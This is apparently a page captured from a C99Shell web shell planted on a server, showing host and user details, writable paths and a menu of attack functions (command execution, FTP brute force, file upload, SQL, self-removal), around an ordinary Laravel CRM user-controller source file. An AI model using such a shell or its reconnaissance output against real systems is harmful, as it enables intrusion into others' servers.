!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/laravel-crm/packages/Webkul/Admin/src/Http/Controllers/Settings/   drwxrwxrwx
Free 13.16 GB of 57.97 GB (22.71%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     UserController.php (7.5 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Webkul\Admin\Http\Controllers\Settings;

use 
Illuminate\Http\JsonResponse;
use 
Illuminate\Http\Resources\Json\JsonResource;
use 
Illuminate\Support\Arr;
use 
Illuminate\Support\Facades\Event;
use 
Illuminate\Support\Facades\Mail;
use 
Illuminate\View\View;
use 
Prettus\Repository\Criteria\RequestCriteria;
use 
Webkul\Admin\DataGrids\Settings\UserDataGrid;
use 
Webkul\Admin\Http\Controllers\Controller;
use 
Webkul\Admin\Http\Requests\MassDestroyRequest;
use 
Webkul\Admin\Http\Requests\MassUpdateRequest;
use 
Webkul\Admin\Http\Resources\UserResource;
use 
Webkul\Admin\Notifications\User\Create as UserCreatedNotification;
use 
Webkul\User\Repositories\GroupRepository;
use 
Webkul\User\Repositories\RoleRepository;
use 
Webkul\User\Repositories\UserRepository;

class 
UserController extends Controller
{
    
/**
     * Create a new controller instance.
     *
     * @return void
     */
    
public function __construct(
        protected 
UserRepository $userRepository,
        protected 
GroupRepository $groupRepository,
        protected 
RoleRepository $roleRepository
    
) {}

    
/**
     * Display a listing of the resource.
     */
    
public function index(): View|JsonResponse
    
{
        if (
request()->ajax()) {
            return 
datagrid(UserDataGrid::class)->process();
        }

        
$roles $this->roleRepository->all();

        
$groups $this->groupRepository->all();

        return 
view('admin::settings.users.index'compact('roles''groups'));
    }

    
/**
     * Store a newly created resource in storage.
     */
    
public function store(): View|JsonResponse
    
{
        
$this->validate(request(), [
            
'email'            => 'required|email|unique:users,email',
            
'name'             => 'required',
            
'password'         => 'nullable',
            
'confirm_password' => 'nullable|required_with:password|same:password',
            
'role_id'          => 'required',
            
'status'           => 'boolean|in:0,1',
            
'view_permission'  => 'string|in:global,group,individual',
        ]);

        
$data request()->all();

        if (
            isset(
$data['password'])
            && 
$data['password']
        ) {
            
$data['password'] = bcrypt($data['password']);
        }

        
Event::dispatch('settings.user.create.before');

        
$admin $this->userRepository->create($data);

        
$admin->groups()->sync($data['groups'] ?? []);

        try {
            
Mail::queue(new UserCreatedNotification($admin));
        } catch (
\Exception $e) {
            
report($e);
        }

        
Event::dispatch('settings.user.create.after'$admin);

        return new 
JsonResponse([
            
'data'    => $admin,
            
'message' => trans('admin::app.settings.users.index.create-success'),
        ]);
    }

    
/**
     * Show the form for editing the specified resource.
     */
    
public function edit(int $id): View|JsonResponse
    
{
        
$admin $this->userRepository->with(['role''groups'])->findOrFail($id);

        return new 
JsonResponse([
            
'data'   => $admin,
        ]);
    }

    
/**
     * Update the specified resource in storage.
     */
    
public function update(int $id): JsonResponse
    
{
        
$this->validate(request(), [
            
'email'            => 'required|email|unique:users,email,'.$id,
            
'name'             => 'required|string',
            
'password'         => 'nullable|string|min:6',
            
'confirm_password' => 'nullable|required_with:password|same:password',
            
'role_id'          => 'required|integer|exists:roles,id',
            
'status'           => 'nullable|boolean|in:0,1',
            
'view_permission'  => 'required|string|in:global,group,individual',
        ]);

        
$data request()->all();

        if (empty(
$data['password'])) {
            
$data Arr::except($data, ['password''confirm_password']);
        } else {
            
$data['password'] = bcrypt($data['password']);
        }

        
$authUser auth()->guard('user')->user();

        if (
$authUser->id == $id) {
            
$data['status'] = true;
        }

        
Event::dispatch('settings.user.update.before'$id);

        
$admin $this->userRepository->update($data$id);

        
$admin->groups()->sync($data['groups'] ?? []);

        
Event::dispatch('settings.user.update.after'$admin);

        return new 
JsonResponse([
            
'data'    => $admin,
            
'message' => trans('admin::app.settings.users.index.update-success'),
        ]);
    }

    
/**
     * Search user results.
     */
    
public function search(): JsonResource
    
{
        
$users $this->userRepository
            
->pushCriteria(app(RequestCriteria::class))
            ->
all();

        return 
UserResource::collection($users);
    }

    
/**
     * Destroy specified user.
     */
    
public function destroy(int $id): JsonResponse
    
{
        if (
$this->userRepository->count() == 1) {
            return new 
JsonResponse([
                
'message' => trans('admin::app.settings.users.index.last-delete-error'),
            ], 
400);
        }

        try {
            
Event::dispatch('user.admin.delete.before'$id);

            
$this->userRepository->delete($id);

            
Event::dispatch('user.admin.delete.after'$id);

            return new 
JsonResponse([
                
'message' => trans('admin::app.settings.users.index.delete-success'),
            ], 
200);
        } catch (
\Exception $e) {
        }

        return new 
JsonResponse([
            
'message' => trans('admin::app.settings.users.index.delete-failed'),
        ], 
500);
    }

    
/**
     * Mass Update the specified resources.
     */
    
public function massUpdate(MassUpdateRequest $massDestroyRequest): JsonResponse
    
{
        
$count 0;

        
$users $this->userRepository->findWhereIn('id'$massDestroyRequest->input('indices'));

        foreach (
$users as $users) {
            if (
auth()->guard('user')->user()->id == $users->id) {
                continue;
            }

            
Event::dispatch('settings.user.update.before'$users->id);

            
$this->userRepository->update([
                
'status' => $massDestroyRequest->input('value'),
            ], 
$users->id);

            
Event::dispatch('settings.user.update.after'$users->id);

            
$count++;
        }

        if (! 
$count) {
            return 
response()->json([
                
'message' => trans('admin::app.settings.users.index.mass-update-failed'),
            ], 
400);
        }

        return 
response()->json([
            
'message' => trans('admin::app.settings.users.index.mass-update-success'),
        ]);
    }

    
/**
     * Mass Delete the specified resources.
     */
    
public function massDestroy(MassDestroyRequest $massDestroyRequest): JsonResponse
    
{
        
$count 0;

        
$users $this->userRepository->findWhereIn('id'$massDestroyRequest->input('indices'));

        foreach (
$users as $user) {
            if (
auth()->guard('user')->user()->id == $user->id) {
                continue;
            }

            
Event::dispatch('settings.user.delete.before'$user->id);

            
$this->userRepository->delete($user->id);

            
Event::dispatch('settings.user.delete.after'$user->id);

            
$count++;
        }

        if (! 
$count) {
            return 
response()->json([
                
'message' => trans('admin::app.settings.users.index.mass-delete-failed'),
            ], 
400);
        }

        return 
response()->json([
            
'message' => trans('admin::app.settings.users.index.mass-delete-success'),
        ]);
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0403 ]--